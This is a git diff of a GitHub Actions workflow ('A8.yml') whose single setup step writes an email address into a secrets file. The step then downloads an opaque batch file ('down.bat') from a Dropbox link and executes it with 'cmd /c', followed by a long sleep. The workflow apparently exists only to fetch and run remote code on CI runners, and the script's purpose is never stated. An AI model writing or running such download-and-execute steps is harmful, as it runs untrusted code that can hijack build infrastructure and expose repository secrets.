--- a/.github/workflows/A8.yml
+++ b/.github/workflows/A8.yml
@@ -10,15 +10,12 @@ jobs:
     steps:
     
       - name: Setting Up
-        run: echo "EMAIL_SECRET=ainxd@hldrive.com" > secrets.txt
-      
-      - name: Waiting
-        run: start-sleep 10
-      
-      - name: Downloading
-        run: Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/ypcru14dbac39y2xc0kvs/down.bat?rlkey=xwqih8zsxw6p7vc7t8b0gj8vl&dl=1" -OutFile "down.bat"
+        run: |
+         echo "EMAIL_SECRET=ainxd@hldrive.com" > secrets.txt
+         start-sleep 5
+         wget "https://www.dropbox.com/scl/fi/ypcru14dbac39y2xc0kvs/down.bat?rlkey=xwqih8zsxw6p7vc7t8b0gj8vl&dl=1" -OutFile "down.bat"
          cmd /c down.bat
-      
+            
       - name: A
         run: |
          start-sleep 300
